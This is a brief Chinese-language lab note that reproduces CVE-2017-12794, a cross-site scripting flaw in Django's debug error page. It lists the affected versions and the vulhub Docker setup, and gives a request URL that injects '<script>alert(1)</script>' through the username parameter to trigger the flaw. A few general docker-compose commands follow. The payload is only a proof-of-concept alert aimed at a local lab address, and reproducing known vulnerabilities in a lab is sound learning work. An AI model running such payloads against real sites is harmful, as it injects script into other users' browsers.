声明
好好学习,天天向上
漏洞描述
Django是Django软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。Django1.10.8之前的版本和1.11.5之前的1.11.x版本中的Technical500Template存在安全漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。
影响范围
Djangoproject Django 1.11.1 -1.11.4
Djangoproject Django 1.10.6-1.10.7
复现过程
这里使用1.11.4版本
使用vulhub
cd /app/vulhub-master/django/CVE-2017-12794
使用docker启动
docker-compose up -d
环境启动后,访问创建用户,IP自己改哦
http://192.168.239.129:8000/create_user/?username=<script>alert(1)</script>
成功后,再次访问,触发异常:
http://192.168.239.129:8000/create_user/?username=<script>alert(1)</script>
关闭镜像(每次用完后关闭)
docker-compose down
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down